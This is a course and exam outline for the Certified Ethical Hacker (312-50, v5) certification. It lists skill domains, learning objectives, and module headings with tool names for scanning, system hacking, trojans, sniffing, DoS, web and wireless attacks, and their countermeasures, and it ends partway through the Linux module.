Ethical Hacking and Countermeasures (312-50)
• The exam codes EC0-350 are 312-50 are the same exam.
• The exam title "Certified Ethical Hacker" and "Ethical Hacking and Countermeasures" are the same
• VUE and Prometric systems use different exam codes.
• The CEHv4 exam has been retired since June 1st 2007
• CEHv5 exam is available on Prometric Prime, APTC and VUE.
• Exams at VUE and Prometric APTC requires Eligibility Code.
• Please visit :
• http://www.eccouncil.org/takeexam.htm for details
•
• Credit Towards Certification
Certified Ethical Hacker
Master of Security Science (MSS)
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Ethics and Legality
Ethics and Legality
Understand Ethical Hacking terminology
Define the Job role of an ethical hacker
Understand the different phases involved in ethical hacking
Identify different types of hacking technologies
List the 5 stages of ethical hacking?
What is hacktivism?
List different types of hacker classes
Define the skills required to become an ethical hacker
What is vulnerability research?
Describe the ways in conducting ethical hacking
Understand the Legal implications of hacking
Understand 18 U.S.C. § 1030 US Federal Law
Footprinting
Define the term Footprinting
Describe information gathering methodology
Describe competitive intelligence
Understand DNS enumeration
Understand Whois, ARIN lookup
Identify different types of DNS records
Understand how traceroute is used in Footprinting
Understand how e-mail tracking works
Understand how web spiders work
Scanning
Define the term port scanning, network scanning and vulnerability scanning
Understand the CEH scanning methodology
Understand Ping Sweep techniques
Understand nmap command switches
Understand SYN, Stealth, XMAS, NULL, IDLE and FIN scans
List TCP communication flag types
Understand War dialing techniques
Understand banner grabbing and OF fingerprinting techniques
Understand how proxy servers are used in launching an attack
How does anonymizers work
Understand HTTP tunneling techniques
Understand IP spoofing techniques
Enumeration
What is Enumeration?
What is meant by null sessions
What is SNMP enumeration?
What are the steps involved in performing enumeration?
System hacking
Understanding password cracking techniques
Understanding different types of passwords
Identifying various password cracking tools
Understand Escalating privileges
Understanding keyloggers and other spyware technologies
Understand how to Hide files
Understanding rootkits
Understand Steganography technologies
Understand how to covering your tracks and erase evidences
Trojans and Backdoors
What is a Trojan?
What is meant by overt and covert channels?
List the different types of Trojans
What are the indications of a Trojan attack?
Understand how “Netcat” Trojan works
What is meant by “wrapping”
How does reverse connecting Trojans work?
What are the countermeasure techniques in preventing Trojans?
Understand Trojan evading techniques
Sniffers
Understand the protocol susceptible to sniffing
Understand active and passive sniffing
Understand ARP poisoning
Understand ethereal capture and display filters
Understand MAC flooding
Understand DNS spoofing techniques
Describe sniffing countermeasures
Denial of Service
Understand the types of DoS Attacks
Understand how DDoS attack works
Understand how BOTs/BOTNETS work
What is “smurf” attack
What is “SYN” flooding
Describe the DoS/DDoS countermeasures
Social Engineering
What is Social Engineering?
What are the Common Types of Attacks
Understand Dumpster Diving
Understand Reverse Social Engineering
Understand Insider attacks
Understand Identity Theft
Describe Phishing Attacks
Understand Online Scams
Understand URL obfuscation
Social Engineering countermeasures
Session Hijacking
Understand Spoofing vs. Hijacking
List the types of Session Hijacking
Understand Sequence Prediction
What are the steps in performing session hijacking
Describe how you would prevent session hijacking
Hacking Web Servers
List the types of web server vulnerabilities
Understand the attacks Against Web Servers
Understand IIS Unicode exploits
Understand patch management techniques
Understand Web Application Scanner
What is Metasploit Framework?
Describe Web Server hardening methods
Web Application Vulnerabilities
Understanding how web application works
Objectives of web application hacking
Anatomy of an attack
Web application threats
Understand Google hacking
Understand Web Application Countermeasures
Web Based Password Cracking Techniques
List the Authentication types
What is a Password Cracker?
How does a Password Cracker work?
Understand Password Attacks - Classification
Understand Password Cracking Countermeasures
SQL Injection
What is SQL injection?
Understand the Steps to conduct SQL injection
Understand SQL Server vulnerabilities
Describe SQL Injection countermeasures
Wireless Hacking
Overview of WEP, WPA authentication systems and cracking techniques
Overview of wireless Sniffers and SSID, MAC Spoofing
Understand Rogue Access Points
Understand Wireless hacking techniques
Describe the methods in securing wireless networks
Virus and Worms
Understand the difference between an virus and a Worm
Understand the types of Viruses
How a virus spreads and infects the system
Understand antivirus evasion techniques
Understand Virus detection methods
Physical Security
Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Factors affecting physical security
Linux Hacking
Understand how to compile a Linux Kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods
Evading IDS, Honeypots and Firewalls
List the types of Intrusion Detection Systems and evasion techniques
List firewall and honeypot evasion techniques
Buffer Overflows
Overview of stack based buffer overflows
Identify the different types of buffer overflows and methods of detection
Overview of buffer overflow mutation techniques
Cryptography
Overview of cryptography and encryption techniques
Describe how public and private keys are generated
Overview of MD5, SHA, RC4, RC5, Blowfish algorithms
Penetration Testing Methodologies
Overview of penetration testing methodologies
List the penetration testing steps
Overview of the Pen-Test legal framework
Overview of the Pen-Test deliverables
List the automated penetration testing tools
Course Outline Version 5
Module 1: Introduction to Ethical Hacking
Why Security?
Essential Terminologies
Elements of Security
The Security, Functionality, and Ease of Use Triangle
What Does a Malicious Hacker Do?
o Reconnaissance
o Scanning
o Gaining access
o Maintaining access
o Covering Tracks
Types of Hacker Attacks
o Operating System attacks
o Application-level attacks
o Shrink Wrap code attacks
o Misconfiguration attacks
Hacktivism
Hacker Classes
Hacker Classes and Ethical Hacking
What Do Ethical Hackers Do?
Can Hacking be Ethical?
How to Become an Ethical Hacker?
Skill Profile of an Ethical Hacker
What is Vulnerability Research?
Why Hackers Need Vulnerability Research?
Vulnerability Research Tools
Vulnerability Research Websites
How to Conduct Ethical Hacking?
Approaches to Ethical Hacking
Ethical Hacking Testing
Ethical Hacking Deliverables
Computer Crimes and Implications
Legal Perspective
o U.S. Federal Law
o Japan’s Cyber Laws
o United Kingdom’s Cyber Laws
o Australia’s Cyber Laws
o Germany’s Cyber Laws
o Singapore’s Cyber Laws
Module 2: Footprinting
Revisiting Reconnaissance
Defining of Footprinting
Information Gathering Methodology
Unearthing Initial Information
Finding a Company’s URL
Internal URL
Extracting Archive 0f a Website
Google Search for Company’s Info.
People Search
Footprinting Through Job Sites
Passive Information Gathering
Competitive Intelligence Gathering
Why Do You Need Competitive Intelligence?
Companies Providing Competitive Intelligence Services
Competitive Intelligence
o When Did This Company Begin?
o How Did It Develop?
o What Are This Company's Plans?
o What Does Expert Opinion Say About The Company?
o Who Are The Leading Competitors?
Public and Private Websites
Tools
o DNS Enumerator
o SpiderFoot
o Sensepost Footprint Tools
• BiLE.pl
• BiLE-weigh.pl
• tld-expand.pl
• vet-IPrange.pl
• qtrace.pl
• vet-mx.pl
• jarf-rev
• jarf-dnsbrute
o Wikito Footprinting Tool
o Web Data Extractor Tool
o Whois
o Nslookup
o Necrosoft
o ARIN
o Traceroute
o Neo Trace
o GEOSpider
o Geowhere
o GoogleEarth
o VisualRoute Trace
o Kartoo Search Engine
o Touchgraph Visual Browser
o SmartWhois
o VisualRoute Mail Tracker
o eMailTrackerPro
o Read Notify
o HTTrack Web Site Copier
o Web Ripper
o robots.txt
o Website watcher
o E-mail Spider
o Power E-mail Collector Tool
Steps to Perform Footprinting
Module 3: Scanning
Definition of Scanning
Types of Scanning
o Port Scanning
o Network Scanning
o Vulnerability Scanning
Objectives of Scanning
CEH Scanning Methodology
o Check for live systems
• ICMP Scanning
• Angry IP
• HPING2
• Ping Sweep
• Firewalk
o Check for open ports
• Nmap
• TCP Communication Flags
• Three Way Handshake
• SYN Stealth / Half Open Scan
• Stealth Scan
• Xmas Scan
• FIN Scan
• NULL Scan
• IDLE Scan
• ICMP Echo Scanning/List Scan
• TCP Connect / Full Open Scan
• FTP Bounce Scan
• FTP Bounce Attack
• SYN/FIN Scanning Using IP Fragments
• UDP Scanning
• Reverse Ident Scanning
• RPC Scan
• Window Scan
• Blaster Scan
• PortScan Plus, Strobe
• IPSecScan
• NetScan Tools Pro
• WUPS – UDP Scanner
• SuperScan
• IPScanner
• MegaPing
• Global Network Inventory Scanner
• Net Tools Suite Pack
• FloppyScan
• War Dialer Technique
• Why War Dialing?
• Wardialing
• PhoneSweep
• THC Scan
• SandTrap Tool
o Banner grabbing/OS Fingerprinting
• OS Fingerprinting
• Active Stack Fingerprinting
• Passive Fingerprinting
• Active Banner Grabbing Using Telnet
• GET REQUESTS
• p0f – Banner Grabbing Tool
• p0f for Windows
• Httprint Banner Grabbing Tool
• Active Stack Fingerprinting
• XPROBE2
• RING V2
• Netcraft
• Disabling or Changing Banner
• Apache Server
• IIS Server
• IIS Lockdown Tool
• ServerMask
• Hiding File Extensions
• PageXchanger 2.0
o Identify Service
o Scan for Vulnerability
• Bidiblah Automated Scanner
• Qualys Web-based Scanner
• SAINT
• ISS Security Scanner
• Nessus
• GFI LANGuard
• SATAN (Security Administrator’s Tool for Analyzing Networks)
• Retina
• NIKTO
• SAFEsuite Internet Scanner
• IdentTCPScan
o Draw network diagrams of Vulnerable hosts
• Cheops
• FriendlyPinger
o Prepare proxies
• Proxy Servers
• Use of Proxies for Attack
• SocksChain
• Proxy Workbench
• ProxyManager Tool
• Super Proxy Helper Tool
• Happy Browser Tool (Proxy-based)
• MultiProxy
• TOR Proxy Chaining Software
o Anonymizers
• Primedius Anonymizer
• Browzar
• Torpark Browser
• G-Zapper - Google Cookies
o SSL Proxy Tool
o HTTP Tunneling Techniques
o HTTPort
o Spoofing IP Address - Source Routing
o Detecting IP Spoofing
o Despoof Tool
o Scanning Countermeasures
o Tool: SentryPC
Module 4: Enumeration
Overview of System Hacking Cycle
What is Enumeration?
Techniques for Enumeration
Netbios Null Sessions
Tool
o DumpSec
o NetBIOS Enumeration Using Netview
o Nbtstat
o SuperScan4
o Enum
o sid2user
o user2sid
o GetAcct
Null Session Countermeasures
PSTools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLoggedOn
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o PsUptime
SNMP Enumeration
Management Information Base
Tools
o SNMPutil
o Solarwinds
o SNScan V1.05
o Getif SNMP MIB Browser
UNIX Enumeration
SNMP UNIX Enumeration
SNMP Enumeration Countermeasures
Tools
o Winfingerprint
o Windows Active Directory Attack Tool
o IP Tools Scanner
o Enumerate Systems Using Default Passwords
Steps to Perform Enumeration
Module 5: System Hacking
Cracking Passwords
o Password Types
o Types of Password Attacks
o Passive Online – Wire Sniffing
o Passive Online Attacks
o Active Online – Password Guessing
o Offline Attacks
• Dictionary Attack
• Hybrid Attack
• Brute-force Attack
• Pre-computed Hashes
o Non-Technical Attacks
o Password Mitigation
o Permanent Account Lockout – Employee Privilege Abuse
o Administrator Password Guessing
o Manual Password Cracking Algorithm
o Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
o Tools
• NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool
• Legion
• LOphtcrack
o Microsoft Authentication - LM, NTLMv1, and NTLMv2
o Kerberos Authentication
o What is LAN Manager Hash?
o Salting
o Tools
• PWdump2 and Pwdump3
• Rainbowcrack
• KerbCrack
• NBTDeputy
• NetBIOS DoS Attack
• John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o Sniffing Hashes Using LophtCrack
o Tools
• ScoopLM
• SMB Replay Attacks
• Replay Attack Tool: SMBProxy
• Hacking Tool: SMB Grind
• Hacking Tool: SMBDie
o SMBRelay Weaknesses & Countermeasures
o Password Cracking Countermeasures
o LM Hash Backward Compatibility
o How to Disable LM HASH?
o Tools
• Password Brute-Force Estimate Tool
• Syskey Utility
Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 Passwords
o Active@ Password Changer
o Change Recovery Console Password
o Privilege Escalation Tool: x.exe
Executing applications
o Tool:
• Psexec
• Remoexec
• Alchemy Remote Executor
• Keystroke Loggers
• E-mail Keylogger
• Spytector FTP Keylogger
• IKS Software Keylogger
• Ghost Keylogger
• Hardware Keylogger
• Keyboard Keylogger: KeyGhost Security Keyboard
• USB Keylogger:KeyGhost USB Keylogger
o What is Spyware?
o Tools
• Spyware: Spector
• Remote Spy
• eBlaster
• Stealth Voice Recorder
• Stealth Keylogger
• Stealth Website Logger
• Digi-Watcher Video Surveillance
• Desktop Spy Screen Capture Program
• Telephone Spy
• Print Monitor Spy Tool
• Perfect Keylogger
• Stealth Email Redirector
• Spy Software: Wiretap Professional
• Spy Software: FlexiSpy
• PC PhoneHome
o Keylogger Countermeasures
o Anti-Keylogger
o PrivacyKeyboard
Hiding Files
o Hacking Tool: RootKit
o Why Rootkits?
o Rootkits in Linux
o Detecting Rootkits
o Rootkit Detection Tools
• BlackLight from F-Secure Corp
• RootkitRevealer from Sysinternals
• Malicious Software Removal Tool from Microsoft Corp
o Sony Rootkit Case Study
o Planting the NT/2000 Rootkit
o Rootkits
• Fu
• AFX Rootkit 2005
• Nuclear
• Vanquish
o Rootkit Countermeasures
o Patchfinder2.0
o RootkitRevealer
o Creating Alternate Data Streams
o How to Create NTFS Streams?
o NTFS Stream Manipulation
o NTFS Streams Countermeasures
o NTFS Stream Detectors
• ADS Spy
• ADS Tools
o What is Steganography?
o Tools
• Merge Streams
• Invisible Folders
• Invisible Secrets 4
• Image Hide
• Stealth Files
• Steganography
• Masker Steganography Tool
• Hermetic Stego
• DCPP – Hide an Operating System
• Camera/Shy
• Mp3Stego
• Snow.exe
o Video Steganography
o Steganography Detection
o SIDS ( Stego intrusion detection system )
o High-Level View
o Tool : dskprobe.exe
Covering tracks
o Disabling Auditing
o Clearing the Event Log
o Tools
• elsave.exe
• Winzapper
• Evidence Eliminator
• Traceless
• Tracks Eraser Pro
• ZeroTracks
Module 6: Trojans and Backdoors
Introduction
Effect on Business
What is a Trojan?
Overt and Covert Channels
Working of Trojans
Different Types of Trojans
What Do Trojan Creators Look For?
Different Ways a Trojan Can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
How to Determine which Ports are “Listening”?
Classic Trojans Found in the Wild
Trojans
o Tini
o iCmd
o NetBus
o Netcat
o Beast
o MoSucker
o Proxy Server
o SARS Trojan Notification
Wrappers
Wrapper Covert Program
Wrapping Tools
o One file EXE Maker
o Yet Another Binder
o Pretator Wrapper
Packaging Tool: WordPad
RemoteByMail
Tool: Icon Plus
Defacing Application: Restorator
HTTP Trojans
Trojan Attack through Http
HTTP Trojan (HTTP RAT)
Shttpd Trojan - HTTP Server
Reverse Connecting Trojans
Nuclear RAT Trojan (Reverse Connecting)
Tool: BadLuck Destructive Trojan
ICMP Tunneling
ScreenSaver Password Hack Tool – Dummylock
Trojan
o Phatbot
o Amitis
o Senna Spy
o QAZ
o Back Orifice
o Back Oriffice 2000
o SubSeven
o CyberSpy Telnet Trojan
o Subroot Telnet Trojan
o Let Me Rule! 2.0 BETA 9
o Donald Dick
o RECUB
Hacking Tool: Loki
Atelier Web Remote Commander
Trojan Horse Construction Kit
How to Detect Trojans?
Tools
o Netstat
o fPort
o TCPView
o CurrPorts
o Process Viewer
o What’s on My Computer
o Super System Helper
Delete Suspicious Device Drivers
Inzider - Tracks Processes and Ports
Tools
o What's Running?
o MSConfig
o Registry-What’s Running
o Autoruns
o Hijack This (System Checker)
o Startup List
Anti-Trojan Software
Evading Anti-Virus Techniques
Evading Anti-Trojan/Anti-Virus Using Stealth Tools v2.0
Backdoor Countermeasures
Tools
o Tripwire
o System File Verification
o MD5sum.exe
o Microsoft Windows Defender
How to Avoid a Trojan Infection?
Module 7: Sniffers
Definition of Sniffing
Protocols Vulnerable to Sniffing
o Tool: Network View – Scans the Network for Devices
o The Dude Sniffer
o Ethereal
o tcpdump
Types of Sniffing
o Passive Sniffing
o Active sniffing
ARP - What is Address Resolution Protocol?
ARP Spoofing Attack
o How Does ARP Spoofing Work?
o ARP Poisoning
o Mac Duplicating Attack
Tools for ARP Spoofing
o Arpspoof (Linux-based tool)
o Ettercap (Linux and Windows)
MAC Flooding
Tools for MAC Flooding
o Macof (Linux-based tool)
o Etherflood (Linux and Windows)
Threats of ARP Poisoning
IRS – ARP Attack Tool
ARPWorks Tool
Tool: Nemesis
Sniffer Hacking Tools (dsniff package)
o Arpspoof
o Dnsspoof
o Dsniff
o Filesnarf
o Mailsnarf
o Msgsnarf
o Tcpkill
o Tcpnice
o Urlsnarf
o Webspy
o Webmitm
DNS Poisoning Techniques
Types of DNS Poisoning:
o Intranet DNS Spoofing (Local network)
o Internet DNS Spoofing (Remote network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Sniffers
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Cain and Abel
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Raw Sniffing Tools
o Sniffit
o Aldebaran
o Hunt
o NGSSniff
o Ntop
o Pf
o IPTraf
o EtherApe
o Netfilter
o Network Probe
o Maa Tec Network Analyzer
Tools
o Snort
o Windump
o Etherpeek
o Mac Changer
o Iris
o NetIntercept
o WinDNSSpoof
How to Detect Sniffing?
AntiSniff Tool
ArpWatch Tool
Countermeasures
Module 8: Denial of Service
What are Denial of Service Attacks?
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
o DoS attack
o DDos attack
DoS Attack Classification
o Smurf
o Buffer Overflow Attack
o Ping of death
o Teardrop
o SYN Attack
DoS Attack Tools
o Jolt2
o Bubonic.c
o Land and LaTierra
o Targa
o Blast20
o Nemesy
o Panther2
o Crazy Pinger
o Some Trouble
o UDP Flood
o FSMax
Botnets
Uses of botnets
Types of Bots
o Agobot/Phatbot/Forbot/XtremBot
o SDBot/RBot/UrBot/UrXBot
o mIRC-based Bots - GT-Bots
Tool: Nuclear Bot
What is DDoS Attack?
Characteristics of DDoS Attacks
DDOS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o Trin00
o Tribe Flood Network (TFN)
o TFN2K
o Stacheldraht
o Shaft
o Trinity
o Knight
o Mstream
o Kaiten
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Reflected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks
Mitigate or Stop the Effects of DDoS Attacks
Deflect Attacks
Post-attack Forensics
Packet Traceback
Module 9: Social Engineering
What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-based
o Computer-based
Preventing Insider Threat
Common Targets of Social Engineering
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective?
Warning Signs of an Attack
Tool : Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist
Phishing Attacks and Identity Theft
What is Phishing?
Phishing Report
Attacks
Hidden Frames
URL Obfuscation
URL Encoding Techniques
IP Address to Base 10 Formula
Karen’s URL Discombobulator
HTML Image Mapping Techniques
Fake Browser Address Bars
Fake Toolbars
Fake Status Bar
DNS Cache Poisoning Attack
Module 10: Session Hijacking
What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
o Active
o Passive
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Number Prediction
TCP/IP Hijacking
RST Hijacking
RST Hijacking Tool: hijack_rst.sh
Programs that Perform Session Hijacking
Hacking Tools
o Juggernaut
o Hunt
o TTY Watcher
o IP Watcher
o T-Sight
o Paros HTTP Session
Remote TCP Session Reset Utility
Dangers Posed by Hijacking
Protecting against Session Hijacking
Countermeasure: IP Security
IP-SEC
Module 11: Hacking Web Servers
How Web Servers Work
How are Web Servers Compromised?
How are Web Servers Defaced?
Apache Vulnerability
Attacks Against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool: IISxploit.exe
Msw3prt IPP Vulnerability
WebDAV / ntdll.dll Vulnerability
RPC DCOM Vulnerability
ASN Exploits
ASP Trojan (cmd.asp)
IIS Logs
Network Tool: Log Analyzer
Hacking Tool: CleanIISLog
Unspecified Executable Path Vulnerability
Metasploit Framework
Immunity CANVAS Professional
Core Impact
Hotfixes and Patches
What is Patch Management?
Solution: UpdateExpert
Patch Management Tool
o Qfecheck
o HFNetChk
cacls.exe Utility
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tools
o Whisker
o N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
SecureIIS
Countermeasures
File System Traversal Countermeasures
Increasing Web Server Security
Web Server Protection Checklist
Module 12: Web Application Vulnerabilities
Web Application Setup
Web Application Hacking
Anatomy of an Attack
Web Application Threats
Cross-Site Scripting/XSS Flaws
o Countermeasures
SQL Injection
Command Injection Flaws
o Countermeasures
Cookie/Session Poisoning
o Countermeasures
Parameter/Form Tampering
Buffer Overflow
o Countermeasures
Directory Traversal/Forceful Browsing
o Countermeasures
Cryptographic Interception
Cookie Snooping
Authentication Hijacking
o Countermeasures
Log Tampering
Error Message Interception
Attack Obfuscation
Platform Exploits
DMZ Protocol Attacks
o Countermeasures
Security Management Exploits
Web Services Attacks
Zero-Day Attacks
Network Access Attacks
TCP Fragmentation
Hacking Tools
o Instant Source
o Wget
o WebSleuth
o BlackWidow
o WindowBomb
o Burp
o cURL
o dotDefender
o Google Hacking
o Acunetix Web Scanner
o AppScan – Web Application Scanner
o AccessDiver
Module 13: Web-based Password Cracking Techniques
Definition of Authentication
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA Secure Token
o Biometrics
• Face recognition
• Iris scanning
• Retina scanning
• Fingerprinting
• Hand geometry
• Voice recognition
How to Select a Good Password?
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
How Hackers get hold of Passwords?
Windows XP: Remove Saved Passwords
Microsoft Password Checker
What is a Password Cracker?
Modus Operandi of an Attacker Using Password Cracker
How does a Password Cracker Work?
Classification of Attacks
Password Guessing
Query String
Cookies
Dictionary Maker
Available Password Crackers
o LOphtcrack
o John The Ripper
o Brutus
Hacking Tools
o Obiwan
o Authforce
o Hydra
o Cain And Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o WinSSLMiM
o ReadCookies.html
o Wireless WEP Key Password Spy
o RockXP
o WinSSLMiM
o Password Spectator
Countermeasures
Module 14: SQL Injection
Introducing SQL injection
Exploiting Web Applications
SQL Injection Steps
o What Should You Look For?
o What If It Doesn’t Take Input?
o OLE DB Errors
o Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability?
How does it Work?
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table?
How to Retrieve any Data?
How to Update/Insert Data into Database?
Automated SQL Injection Tool
o AutoMagic SQL
o Absinthe
SQL Injection in Oracle
SQL Injection in MySql Database
Attack against SQL Servers
SQL Server Resolution Service (SSRS)
Osql L- Probing
SQL Injection Automated Tools
o SQLDict
o SqlExec
o SQLbf
o SQLSmack
o SQL2.exe
SQL Injection Countermeasures
Preventing SQL Injection Attacks
SQL Injection Blocking Tool: SQLBlock
Acunetix Web Vulnerability Scanner
Module 15: Hacking Wireless Networks
Introduction to Wireless Networking
Wired Network vs. Wireless Network
Effects of Wireless Attacks on Business
Types of Wireless Networks
Advantages and Disadvantages of a Wireless Network
Wireless Standards
o 802.11a
o 802.11b – “WiFi”
o 802.11g
o 802.11i
o 802.11n
Related Technology and Carrier Networks
Antennas
Cantenna
Wireless Access Points
SSID
Beacon Frames
Is the SSID a Secret?
Setting Up a WLAN
Detecting a Wireless Network
How to Access a WLAN
Terminologies
Authentication and Association
Authentication Modes
Authentication and (Dis)Association Attacks
Rogue Access Points
Tools to Generate Rogue Access Points: Fake AP
Tools to Detect Rogue Access Points: Netstumbler
Tools to Detect Rogue Access Points: MiniStumbler
Wired Equivalent Privacy (WEP)
What is WPA?
WPA Vulnerabilities
WEP, WPA, and WPA2
Steps for Hacking Wireless Networks
o Step 1: Find networks to attack
o Step 2: Choose the network to attack
o Step 3: Analyze the network
o Step 4: Crack the WEP key
o Step 5: Sniff the network
Cracking WEP
Weak Keys (a.k.a. Weak IVs)
Problems with WEP’s Key Stream and Reuse
Automated WEP Crackers
Pad-Collection Attacks
XOR Encryption
Stream Cipher
WEP Tools
o Aircrack
o AirSnort
o WEPCrack
o WepLab
Temporal Key Integrity Protocol (TKIP)
LEAP: The Lightweight Extensible Authentication Protocol
LEAP Attacks
MAC Sniffing and AP Spoofing
Tool to Detect MAC Address Spoofing: Wellenreiter V2
Man-in-the-Middle Attack (MITM)
Denial-of-Service Attacks
Dos Attack Tool: Fatajack
Phone Jammers
Scanning Tools
o Redfang 2.5
o Kismet
o THC-WarDrive
o PrismStumbler
o MacStumbler
o Mognet
o WaveStumbler
o StumbVerter
o Netchaser V1.0 for Palm Tops
o AP Scanner
o SSID Sniff
o Wavemon
o Wireless Security Auditor (WSA)
o AirTraf
o Wifi Finder
o AirMagnet
Sniffing Tools
o AiroPeek
o NAI Wireless Sniffer
o Ethereal
o Aerosol v0.65
o vxSniffer
o EtherPEG
o DriftNet
o AirMagnet
o WinDump
o ssidsniff
Multiuse Tool: THC-RUT
PCR-PRO-1k Hardware Scanner
Tools
o WinPcap
o AirPcap
Securing Wireless Networks
Auditing Tool: BSD-Airtools
AirDefense Guard
WIDZ: Wireless Intrusion Detection System
Radius: Used as Additional Layer in Security
Google Secure Access
Module 16: Virus and Worms
Introduction to Virus
Virus History
Characteristics of a Virus
Working of Virus
o Infection Phase
o Attack Phase
Why People create computer viruses?
Symptoms of Virus-Like Attack
Virus Hoaxes
Chain Letters
How is a Worm different from a Virus?
Indications of Virus Attack
Hardware Threats
Software Threats
Virus Damage
Modes of Virus Infection
Stages of Virus Life
Virus Classification
How does a Virus Infect?
Storage Patterns of a Virus
System Sector Viruses
Stealth Virus
Bootable CD-ROM Virus
Self-Modification
Encryption with a Variable Key
Polymorphic Code
Viruses
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
o I Love You Virus
o Melissa Virus
Famous Virus/Worms – JS.Spth
Klez Virus Analysis
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Sheep Dip Computer
Virus Analysis - IDA Pro Tool
Prevention is Better than Cure
Latest Viruses
Top 10 Viruses- 2006
Anti-Virus Software
o AVG Free Edition
o Norton Antivirus
o McAfee
Socketshield
Popular Anti-Virus Packages
Virus Databases
Module 17: Physical Security
Security Statistics
Physical Security Breach Incidents
Understanding Physical Security
What Is the Need for Physical Security?
Who Is Accountable for Physical Security?
Factors Affecting Physical Security
Physical Security Checklist
o Company surroundings
o Premises
o Reception
o Server
o Workstation area
o Wireless access points
o Other equipment, such as fax, and removable media
o Access control
o Biometric Devices
o Smart Cards
o Security Token
o Computer equipment maintenance
o Wiretapping
o Remote access
o Locks
Information Security
EPS (Electronic Physical Security)
Wireless Security
Laptop Theft: Security Statistics
Laptop Theft
Laptop Security Tools
Laptop Tracker - XTool Computer Tracker
Tools to Locate Stolen Laptops
Stop's Unique, Tamper-proof Patented Plate
Tool: TrueCrypt
Laptop Security Countermeasures
Mantrap
TEMPEST
Challenges in Ensuring Physical Security
Spyware Technologies
Spying Devices
Physical Security: Lock Down USB Ports
Tool: DeviceLock
Blocking the Use of USB Storage Devices
Track Stick GPS Tracking Device
Module 18: Linux Hacking
Why Linux?
Linux Distributions
Linux – Basics
Linux Live CD-ROMs
Basic Commands of Linux
Linux File Structure
Linux Networking Commands
Directories in Linux
Compiling the Linux Kernel
How to Install a Kernel Patch?
Compiling Programs in Linux
GCC Commands
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked?
Linux Vulnerabilities in 2005
How to Apply Patches to Vulnerable Programs?
Scanning Networks
Tools
o Nmap in Linux
o Scanning Tool: Nessus
o Tool: Cheops
o Port Scan Detection Tools
Password Cracking in Linux
Firewall in Linux: IPTables
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool
o Netcat
o tcpdump
o Snort
o SAINT
o Ethereal
o Abacus Port Sentry
o DSniff Collection
o Hping2
o Sniffit
o Nemesis
o LSOF
o IPTraf
o LIDS
o Hunt
o TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits
o Knark
o Torn
o Tuxit
o Adore
o Ramen
o Beastkit
Rootkit Countermeasures
Linux Tools: Application Security
Advanced Intrusion Detection Environment (AIDE)
Linux Tools
o Security Testing Tools
o Encryption
